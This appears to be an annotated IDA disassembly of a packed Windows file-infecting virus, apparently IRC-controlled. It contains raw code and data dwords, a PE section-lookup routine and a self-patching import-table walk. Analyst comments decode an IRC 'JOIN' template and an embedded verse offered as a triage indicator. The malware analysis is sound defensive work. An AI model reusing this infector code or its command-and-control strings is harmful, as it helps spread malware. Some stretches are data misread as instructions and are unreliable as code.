loc_31441799: ; CODE XREF: sub_3144159F+1C6j imul ebp, [ebp+65h], 69466F54h insb db 65h push esp imul ebp, [ebp+65h], 6D6E5500h popa jo short loc_31441803 imul esp, [ebp+77h], 6946664Fh insb loc_314417B5: ; CODE XREF: sub_3144159F+1D0j add gs:[esi+69h], dl loc_314417B9: ; CODE XREF: sub_3144159F+1AAj jb short near ptr loc_3144182E+1 jnz short loc_3144181E insb inc ecx insb loc_314417C0: ; CODE XREF: sub_3144159F:loc_3144177Cj insb outsd loc_314417C2: ; CODE XREF: sub_3144159F+1B2j arpl [eax], ax push edi jb short loc_31441830 jz short loc_3144182E inc esi loc_314417CA: ; CODE XREF: sub_3144159F+1E3j ; sub_3144159F:loc_3144175Bj ... imul ebp, [ebp+0], 6441744Eh push 75h jnb short loc_3144184A push eax jb short near ptr loc_3144183F+3 jbe short near ptr loc_3144183F+5 insb loc_314417DC: ; CODE XREF: sub_3144159F+1CBj db 65h, 67h, 65h jnb near ptr 1835h outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_3144182B+1 jb short near ptr loc_3144184F+1 popa jz short loc_31441853 inc esi imul ebp, [ebp+0], 7243744Eh db 65h popa jz short loc_31441860 push eax loc_314417FC: ; CODE XREF: sub_3144159F+1F6j jb short loc_3144186D arpl [ebp+73h], sp jnb short $+2 loc_31441803: ; CODE XREF: sub_3144159F+20Cj dec esi jz short near ptr loc_31441846+3 jb short loc_3144186D loc_31441808: ; CODE XREF: sub_3144159F+1F4j popa jz short loc_31441870 push eax jb short loc_3144187D arpl [ebp+73h], sp jnb short near ptr loc_31441853+5 js short $+2 dec esi jz short loc_3144185B jb short loc_3144187F popa jz short near ptr loc_3144187F+3 push ebx loc_3144181E: ; CODE XREF: sub_3144159F+21Cj arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl inc ebx jb short near ptr loc_3144188E+1 popa loc_3144182B: ; CODE XREF: sub_3144159F+248j jz short loc_31441892 push ebp loc_3144182E: ; CODE XREF: sub_3144159F+228j ; sub_3144159F:loc_314417B9j jnb short near ptr loc_31441894+1 loc_31441830: ; CODE XREF: sub_3144159F+226j jb short near ptr loc_3144187F+3 jb short loc_314418A3 arpl [ebp+73h], sp jnb 
short $+2 dec esi jz short loc_31441889 popa jo short near ptr loc_31441894+1 loc_3144183F: ; CODE XREF: sub_3144159F+238j ; sub_3144159F+23Aj imul esp, [ebp+77h], 6553664Fh loc_31441846: ; CODE XREF: sub_3144159F+265j arpl [ecx+ebp*2+6Fh], si loc_3144184A: ; CODE XREF: sub_3144159F+235j outsb add [esi+74h], cl dec edi loc_3144184F: ; CODE XREF: sub_3144159F+24Aj jo short loc_314418B6 outsb inc esi loc_31441853: ; CODE XREF: sub_3144159F+24Dj ; sub_3144159F+272j imul ebp, [ebp+0], 704F744Eh loc_3144185B: ; CODE XREF: sub_3144159F+277j outs dx, byte ptr gs:[esi] push eax jb short loc_314418CF loc_31441860: ; CODE XREF: sub_3144159F+25Aj arpl [ebp+73h], sp jnb short loc_314418B9 outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314418BB+1 loc_3144186D: ; CODE XREF: sub_3144159F:loc_314417FCj ; sub_3144159F+267j jo short near ptr loc_314418D3+1 outsb loc_31441870: ; CODE XREF: sub_3144159F+26Aj push ebx arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl push eax jb short near ptr loc_314418EB+1 loc_3144187D: ; CODE XREF: sub_3144159F+26Dj jz short near ptr loc_314418E3+1 loc_3144187F: ; CODE XREF: sub_3144159F+279j ; sub_3144159F+27Cj ... 
arpl [esi+edx*2+69h], si jb short loc_314418F9 jnz short near ptr loc_314418E7+1 insb dec ebp loc_31441889: ; CODE XREF: sub_3144159F+29Bj db 65h insd outsd jb short near ptr loc_31441904+3 loc_3144188E: ; CODE XREF: sub_3144159F+289j add [esi+74h], cl push ecx loc_31441892: ; CODE XREF: sub_3144159F:loc_3144182Bj jnz short loc_314418F9 loc_31441894: ; CODE XREF: sub_3144159F:loc_3144182Ej ; sub_3144159F+29Ej jb short near ptr loc_3144190E+1 dec ecx outsb outsw jb short near ptr loc_31441908+1 popa jz short loc_31441908 outsd outsb push esp outsd loc_314418A3: ; CODE XREF: sub_3144159F+293j imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314418FF+2 jb short loc_31441915 jz short near ptr loc_31441912+1 push esi imul esi, [edx+74h], 4D6C6175h loc_314418B6: ; CODE XREF: sub_3144159F:loc_3144184Fj db 65h insd outsd loc_314418B9: ; CODE XREF: sub_3144159F+2C4j jb short loc_31441934 loc_314418BB: ; CODE XREF: sub_3144159F+2CCj add [edx+74h], dl insb push ebp outsb imul esp, [ebx+6Fh], 74536564h jb short near ptr loc_31441931+2 outsb db 67h push esp outsd inc ecx loc_314418CF: ; CODE XREF: sub_3144159F+2BFj outsb jnb short near ptr loc_3144193A+1 push ebx loc_314418D3: ; CODE XREF: sub_3144159F:loc_3144186Dj jz short loc_31441947 imul ebp, [esi+67h], 41535700h push ebx jz short loc_31441940 jb short loc_31441955 jnz short near ptr loc_31441952+1 loc_314418E3: ; CODE XREF: sub_3144159F:loc_3144187Dj add [ebx+6Ch], ah outsd loc_314418E7: ; CODE XREF: sub_3144159F+2E6j jnb short loc_3144194E jnb short near ptr loc_31441959+1 loc_314418EB: ; CODE XREF: sub_3144159F+2DCj arpl [ebx+65h], bp jz short $+2 arpl [edi+6Eh], bp outsb arpl gs:[eax+eax+67h], si loc_314418F9: ; CODE XREF: sub_3144159F+2E4j ; sub_3144159F:loc_31441892j db 65h jz short near ptr loc_31441963+1 outsd jnb short near ptr loc_31441971+2 loc_314418FF: ; CODE XREF: sub_3144159F+309j bound edi, [ecx+6Eh] popa insd loc_31441904: ; CODE XREF: sub_3144159F+2EDj add gs:[edx+65h], dh loc_31441908: ; CODE XREF: 
sub_3144159F+2FEj ; sub_3144159F+2FBj arpl [esi+0], si jnb short near ptr loc_31441971+1 outsb loc_3144190E: ; CODE XREF: sub_3144159F:loc_31441894j add fs:[ebx+6Fh], dh loc_31441912: ; CODE XREF: sub_3144159F+30Dj arpl [ebx+65h], bp loc_31441915: ; CODE XREF: sub_3144159F+30Bj jz short $+2 dec ecx outsb jz short loc_31441980 jb short loc_3144198B db 65h jz short loc_31441963 insb outsd jnb short near ptr loc_31441988+1 dec eax popa outsb db 64h insb add gs:[ecx+6Eh], cl jz short loc_31441994 jb short near ptr loc_3144199E+1 loc_31441931: ; CODE XREF: sub_3144159F+329j db 65h jz short loc_3144197B loc_31441934: ; CODE XREF: sub_3144159F:loc_314418B9j db 65h jz short loc_3144197A outsd outsb outsb loc_3144193A: ; CODE XREF: sub_3144159F+331j arpl gs:[ebp+64h], si push ebx loc_31441940: ; CODE XREF: sub_3144159F+33Ej jz short near ptr loc_314419A2+1 jz short loc_314419A9 add [ecx+6Eh], cl loc_31441947: ; CODE XREF: sub_3144159F:loc_314418D3j jz short near ptr loc_314419AC+2 jb short loc_314419B9 db 65h jz short near ptr loc_3144199B+2 loc_3144194E: ; CODE XREF: sub_3144159F:loc_314418E7j jo short loc_314419B5 outsb inc ecx loc_31441952: ; CODE XREF: sub_3144159F+342j add [ecx+6Eh], cl loc_31441955: ; CODE XREF: sub_3144159F+340j jz short near ptr loc_314419BB+1 jb short loc_314419C7 loc_31441959: ; CODE XREF: sub_3144159F+34Aj db 65h jz short near ptr loc_314419AA+1 jo short loc_314419C3 outsb push ebp jb short near ptr loc_314419CC+2 inc ecx loc_31441963: ; CODE XREF: sub_3144159F+37Ej ; sub_3144159F:loc_314418F9j add [ecx+6Eh], cl jz short near ptr loc_314419CC+1 jb short loc_314419D8 db 65h jz short near ptr loc_314419BE+1 db 65h popa db 64h inc esi loc_31441971: ; CODE XREF: sub_3144159F+36Cj ; sub_3144159F+35Ej imul ebp, [ebp+0], 41564441h push eax loc_3144197A: ; CODE XREF: sub_3144159F:loc_31441934j dec ecx loc_3144197B: ; CODE XREF: sub_3144159F:loc_31441931j xor esi, [edx] db 2Eh inc esp dec esp loc_31441980: ; CODE XREF: sub_3144159F+37Aj dec esp add 
[edx+65h], dl db 67h inc ebx insb outsd loc_31441988: ; CODE XREF: sub_3144159F+383j jnb short near ptr loc_314419ED+2 dec ebx loc_3144198B: ; CODE XREF: sub_3144159F+37Cj db 65h jns short $+3 push edx db 65h, 67h dec edi jo short loc_314419F9 loc_31441994: ; CODE XREF: sub_3144159F+38Ej outsb dec ebx db 65h jns short near ptr loc_314419DC+2 js short loc_314419DC loc_3144199B: ; CODE XREF: sub_3144159F+3ACj add [edx+65h], dl loc_3144199E: ; CODE XREF: sub_3144159F+390j db 67h push ecx jnz short loc_31441A07 loc_314419A2: ; CODE XREF: sub_3144159F:loc_31441940j jb short near ptr loc_31441A1C+1 push esi popa insb jnz short near ptr loc_31441A0D+1 loc_314419A9: ; CODE XREF: sub_3144159F+3A3j inc ebp loc_314419AA: ; CODE XREF: sub_3144159F:loc_31441959j js short loc_314419ED loc_314419AC: ; CODE XREF: sub_3144159F:loc_31441947j add [edx+65h], dl db 67h push ebx db 65h jz short loc_31441A0A popa loc_314419B5: ; CODE XREF: sub_3144159F:loc_3144194Ej insb jnz short near ptr loc_31441A1C+1 inc ebp loc_314419B9: ; CODE XREF: sub_3144159F+3AAj js short loc_314419FC loc_314419BB: ; CODE XREF: sub_3144159F:loc_31441955j add [esi+33h], dl loc_314419BE: ; CODE XREF: sub_3144159F+3CBj imul byte ptr [edx+2] push esi push esi loc_314419C3: ; CODE XREF: sub_3144159F+3BDj mov edx, esp push 1 loc_314419C7: ; CODE XREF: sub_3144159F+3B8j push edx push dword ptr [edx+18h] push esi loc_314419CC: ; CODE XREF: sub_3144159F+3C7j ; sub_3144159F+3C1j call dword ptr [ebp+10427Ch] mov eax, esp push esi push esi push esi push eax loc_314419D8: ; CODE XREF: sub_3144159F+3C9j push esi push dword ptr [eax+18h] loc_314419DC: ; CODE XREF: sub_3144159F+3FAj ; sub_3144159F+3F7j call dword ptr [ebp+103EEAh] add esp, 10h pop esi retn 8 ; END OF FUNCTION CHUNK FOR sub_3144159F ; --------------------------------------------------------------------------- db 8Dh ; db 49h ; I db 0FBh ; db 2Bh ; + ; --------------------------------------------------------------------------- loc_314419ED: ; CODE XREF: 
sub_3144159F:loc_314419AAj ; sub_3144159F:loc_31441988j enter 6851h, 0 ; --------------------------------------------------------------------------- db 0 db 0 db 0E8h ; db 8Dh ; db 4Ch ; L db 24h ; $ db 3 db 6Ah ; j ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3144159F loc_314419F9: ; CODE XREF: sub_3144159F+3F3j add [edx+5], ch loc_314419FC: ; CODE XREF: sub_3144159F:loc_314419B9j push ecx push eax push ebx push 5 mov ecx, esp push eax mov edx, esp push eax loc_31441A07: ; CODE XREF: sub_3144159F+401j push esp push 40h loc_31441A0A: ; CODE XREF: sub_3144159F+412j push ecx push edx push ebx loc_31441A0D: ; CODE XREF: sub_3144159F+408j call dword ptr [ebp+103F12h] add esp, 0Ch call dword ptr [ebp+103F1Ah] loc_31441A1C: ; CODE XREF: sub_3144159F:loc_314419A2j ; sub_3144159F+417j add esp, 8 retn ; END OF FUNCTION CHUNK FOR sub_3144159F ; --------------------------------------------------------------------------- db 8Dh ; db 95h ; db 20h db 3Eh ; > db 10h db 0 db 33h ; 3 db 0C9h ; db 6Ah ; j db 0 db 52h ; R db 68h ; h db 30h ; 0 db 0 db 32h ; 2 db 0 db 8Bh ; db 0C4h ; db 51h ; Q db 51h ; Q db 6Ah ; j db 40h ; @ db 50h ; P db 51h ; Q db 6Ah ; j db 18h db 83h ; db 0C0h ; db 8 db 54h ; T db 6Ah ; j db 0Eh db 50h ; P db 0FFh db 95h ; db 0Eh db 3Fh ; ? db 10h db 0 db 83h ; db 0C4h ; db 20h db 33h ; 3 db 0D2h ; db 85h ; db 0C0h ; db 0Fh db 99h ; db 0C2h ; db 0F7h ; db 0DAh ; db 58h ; X db 23h ; # db 0C2h ; db 0C3h ; db 57h ; W db 33h ; 3 db 0FFh db 0E8h ; db 0C1h ; db 0FFh db 0FFh db 0FFh db 0Fh db 84h ; db 0A5h ; db 0 db 0 db 0 db 50h ; P db 68h ; h db 18h db 73h ; s db 0 db 0 db 8Bh ; db 0D4h ; db 6Ah ; j db 0 db 8Bh ; db 0CCh ; db 6Ah ; j db 40h ; @ db 68h ; h db 0 db 0 db 10h db 0 db 6Ah ; j db 2 db 52h ; R db 6Ah ; j db 0 db 68h ; h db 18h db 73h ; s db 0 db 0 db 6Ah ; j db 0 db 51h ; Q db 53h ; S db 50h ; P db 0FFh db 95h ; db 2 db 3Fh ; ? 
db 10h db 0 db 5Fh ; _ db 59h ; Y db 0FFh db 95h ; db 52h ; R db 3Eh ; > db 10h db 0 db 85h ; db 0FFh db 74h ; t db 71h ; q db 8Bh ; db 8Dh ; db 80h ; db 15h db 10h db 0 db 0E3h ; db 0Ch db 8Dh ; db 95h ; db 0 db 10h db 10h db 0 db 3 db 0D1h ; db 57h ; W db 53h ; S db 0FFh db 0D2h ; db 8Bh ; db 85h ; db 0EEh ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 6 db 29h ; ) db 0 db 0 db 0E8h ; db 2Bh ; + db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 6 db 3Fh ; ? db 10h db 0 db 8Dh ; db 8Fh ; db 53h ; S db 29h ; ) db 0 db 0 db 0E8h ; db 1Ah db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F2h ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 5Ah ; Z db 29h ; ) db 0 db 0 db 0E8h ; db 9 db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F6h ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 20h db 8Dh ; db 8Fh ; db 67h ; g db 29h ; ) db 0 db 0 db 0E8h ; db 0F4h ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 85h ; db 0FEh ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 0Bh db 8Dh ; db 8Fh ; db 74h ; t db 29h ; ) db 0 db 0 db 0E8h ; db 0DFh ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 0C7h ; db 5Fh ; _ db 0C3h ; db 55h ; U db 0E8h ; db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- pop ebp sub ebp, 101B14h xor ecx, ecx lea eax, [ebp+101E9Fh] push ecx push esp push ecx push ecx push eax push ecx push ecx call dword ptr [ebp+103E7Eh] xchg eax, [esp] call dword ptr [ebp+103E52h] pop ebp retn 4 ; --------------------------------------------------------------------------- db 55h, 0E8h, 0 dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh, 52500010h dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B54h, 85C720CDh dd 101B56h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch dd 55C3E2F7h, 0E8h, 0ED815D00h, 101B9Dh, 3F709D8Bh, 7C830010h dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0A695FF00h dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h 
dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h dd 3E7695FFh, 0C4810010h, 208h, 82474FFh, 3F3E95FFh, 0FF530010h dd 103F3E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10157C8Dh dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h dd 6A51CEh, 0FF535651h, 103F3695h, 0C13B5900h, 0DF850Fh dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 958D0010h dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h, 868D8B00h dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h dd 2007473h, 55500000h, 703C8972h, 69786F72h, 72692E6Dh dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 62627075h dd 6F616D63h, 4553550Ah, 4A792052h, 204E494Fh, 72697626h dd 550A7574h, 0E8h, 0ED815D00h, 101EA5h, 156F85C6h, 0FF000010h dd 103EAA95h, 1FE8C100h, 
1E6A3C74h, 3E62B58Bh, 0AC590010h dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh, 2768B00h dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EB695h dd 74C00B00h, 26A930Dh, 5E95FF53h, 0FF00103Eh, 97E893D0h dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EB695h dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h dd 10431485h, 51515100h, 51515051h, 0B295FF51h, 0E800103Eh dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh, 66A5200h dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h dd 103F5295h, 7385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h dd 0BD83FFFFh, 103F42h, 10840F00h, 81000002h, 190ECh, 1685400h dd 0FF000001h, 103F2295h, 90C48100h, 50000001h, 6AD48Bh dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h 
; Raw dwords that IDA left undisassembled; this data run begins above this
; point. Several values are little-endian ASCII sitting between opcode bytes,
; so the region is probably code with inline strings and is worth
; re-disassembling before it is relied on.
;
; The bytes that follow the 1CE8h dword decode to the NUL-terminated text
;   "%.6x . . :%%%.8x%x %s\nJOIN "
; (a printf-style template; the trailing word looks like an IRC JOIN command,
; TODO confirm from the surrounding code once it is disassembled).
                dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h
                dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
                dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h
; 0A642526h decodes to the short template "&%d\n".
                dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
                dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h
                dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h, 74B58D54h
                dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h
                dd 103F3295h, 0F88300h, 8B912F7Eh, 74B58DFEh, 0B000103Fh
                dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
                dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
                dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h
                dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h
                dd 10417385h, 8E90000h, 0C7FFFFFEh, 10157885h, 0
; From the second byte of 4F0A0D00h onward the dwords are plain ASCII with
; CR/LF line breaks. The text reads:
;   "O noon of life! O time to celebrate!" / "     O summer garden!" /
;   "Relentlessly happy and expectant, standing: -" /
;   "Watching all day and night, for friends I wait:" /
;   "Where are you, friends? Come! It is time! It's late!"
; It is a fixed string inside the body, so it can serve as a static indicator
; when triaging samples of this file.
                dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
                dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
                dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
                dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
                dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
                dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
                dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
                dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
                dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
                dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
                dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
                dd 6299AD47h, 10A61429h, 0C26CCC5Ch, 606EF96Ah, 1Bh dup(0)

; =============== S U B R O U T I N E =======================================
;
; sub_31442404 - find the section-table entry that contains a given RVA.
;
; In:   arg_0 (stack)  RVA to look up
;       ebx            header base: word [ebx+6] is used as the entry count and
;                      ebx+18h+word [ebx+14h] as the first 28h-byte entry. These
;                      offsets match NumberOfSections / SizeOfOptionalHeader /
;                      IMAGE_SECTION_HEADER when ebx points at the 'PE'
;                      signature, which is how callers in this listing set it.
;       ebp            base register for the code's own variables
; Out:  [ebp+1042E4h]  address of the matching entry, 0 when nothing matched
;       [ebp+1042E8h]  entry[+14h] - entry[+0Ch] for that entry (raw-file
;                      offset minus virtual address), 0 when nothing matched
; All general registers are preserved (pusha/popa); retn 4 removes the argument.

sub_31442404    proc near               ; CODE XREF: sub_314424BA:loc_314424A8p
                                        ; sub_3144250B+7p ...

arg_0           = dword ptr  4

                pusha
                and     dword ptr [ebp+1042E4h], 0      ; default result: no entry
                and     dword ptr [ebp+1042E8h], 0      ; default result: delta 0
                movzx   eax, word ptr [ebx+14h]
                lea     edx, [ebx+18h]
                movzx   ecx, word ptr [ebx+6]           ; loop counter = entry count
                add     edx, eax                        ; edx = first table entry

loc_31442420:                           ; CODE XREF: sub_31442404+41j
                mov     eax, [esp+20h+arg_0]            ; 20h skips the pusha frame
                sub     eax, [edx+0Ch]                  ; offset of the RVA inside this entry
                jb      short loc_31442442              ; RVA lies below the entry start
                cmp     eax, [edx+8]
                jnb     short loc_31442442              ; RVA lies at or beyond start + [edx+8]
                mov     eax, [edx+14h]
                sub     eax, [edx+0Ch]
                mov     [ebp+1042E4h], edx              ; remember the matching entry
                mov     [ebp+1042E8h], eax              ; remember its raw-minus-virtual delta
                jmp     short loc_31442447
; ---------------------------------------------------------------------------

loc_31442442:                           ; CODE XREF: sub_31442404+23j
                                        ; sub_31442404+28j
                add     edx, 28h                        ; next 28h-byte entry
                loop    loc_31442420

loc_31442447:                           ; CODE XREF: sub_31442404+3Cj
                popa
                retn    4
sub_31442404    endp

; ---------------------------------------------------------------------------
; Code with no procedure frame. The call below does not come back here in the
; normal way: sub_314424BA pops its return address into [ebp+1042C4h] and
; sub_3144250B later calls through that slot, so everything from "push 1Fh"
; onward runs as a per-import callback with ebx holding the name hash that
; sub_3144250B computed.
;
; NOTE(review): with the ebp base used elsewhere in this listing
; (call $+5 / pop ebp / sub ebp, 10343Fh), ebp+102457h appears to be the
; immediate byte of the "push 1Fh" below, i.e. the first instruction patches
; the table length in place. Confirm against the raw bytes.
                mov     [ebp+102457h], al
                call    sub_314424BA
                push    1Fh                             ; number of dwords to scan
                lea     eax, [ebp+102384h]              ; start of the dword table
                pop     ecx

loc_31442462:                           ; CODE XREF: UPX2:31442469j
                cmp     [eax], ebx                      ; is this hash already in the table?
                jz      short loc_31442472
                add     eax, 4
                loop    loc_31442462
                inc     dword ptr [ebp+1042C0h]         ; not in the table: count it
                retn                                    ; back into the import walk
; ---------------------------------------------------------------------------

loc_31442472:                           ; CODE XREF: UPX2:31442464j
                neg     ecx
                add     ecx, [ebp+102457h]              ; presumably the index of the hit; TODO confirm
                jecxz   short loc_3144248C              ; nothing to shift

loc_3144247C:                           ; CODE XREF: UPX2:31442484j
                push    dword ptr [eax-4]               ; move each earlier entry one slot up
                pop     dword ptr [eax]
                sub     eax, 4
                loop    loc_3144247C
                mov     [ebp+102384h], ebx              ; matched hash becomes the first entry
; START OF FUNCTION CHUNK FOR sub_314424BA
;
; Shared exit that leaves the import walk with a result in ecx. edx is expected
; to still point at the 14h-byte import descriptor sub_3144250B was processing
; and esi just past the thunk it read.
; NOTE(review): the three pops appear to drop the callback return address and
; restore the ebx/esi pair that sub_3144250B pushed, and the later pop eax drops
; one more return address so that the final retn unwinds past the walker. IDA
; could not track the stack here; verify in a debugger.

loc_3144248C:                           ; CODE XREF: UPX2:3144247Aj
                                        ; sub_314424BA+34j
                cmp     dword ptr [edx], 0
                jz      short loc_31442496
                sub     esi, [edx]                      ; rebase esi from the [edx] array ...
                add     esi, [edx+10h]                  ; ... to the [edx+10h] array

loc_31442496:                           ; CODE XREF: sub_314424BA-2Bj
                lea     ecx, [esi-4]                    ; slot of the entry just consumed
                pop     eax
                pop     ebx
                pop     esi
                cmp     dword ptr [edx], 0
                jz      short loc_314424A5
                push    dword ptr [edx]
                jmp     short loc_314424A8
; ---------------------------------------------------------------------------

loc_314424A5:                           ; CODE XREF: sub_314424BA-1Bj
                push    dword ptr [edx+10h]

loc_314424A8:                           ; CODE XREF: sub_314424BA-17j
                call    sub_31442404                    ; refresh the delta in [ebp+1042E8h]
                sub     ecx, esi                        ; pointer -> offset from esi
                sub     ecx, [ebp+1042E8h]              ; offset -> RVA
                pop     eax
                add     ecx, [ebx+34h]                  ; + dword at header+34h (ImageBase in a PE32 header)
                retn
; END OF FUNCTION CHUNK FOR sub_314424BA

; =============== S U B R O U T
; I N E =======================================
;
; sub_314424BA - two-pass walk over the import table, driven by callbacks.
;
; The routine pops its own return address into [ebp+1042C4h]; sub_3144250B
; calls through that slot once per imported name, so the instructions that
; follow the original call site act as the first-pass callback. This is why
; IDA reports "sp-analysis failed".
;
; Pass 1: [ebp+1042C0h] is zeroed and the walk runs with the caller-supplied
;         callback.
; Pass 2: the counter value is handed in eax to the helper at
;         dword_31441B40+43h (not visible in this chunk; its call sites load a
;         bound into eax and then test edx, which is consistent with a bounded
;         pseudo-random pick, TODO confirm). sub_314424F7 then repeats the walk
;         with edx as a countdown and with the code after that call as callback.
; In:   ebx, esi, ebp as required by sub_3144250B.

sub_314424BA    proc near               ; CODE XREF: UPX2:31442451p

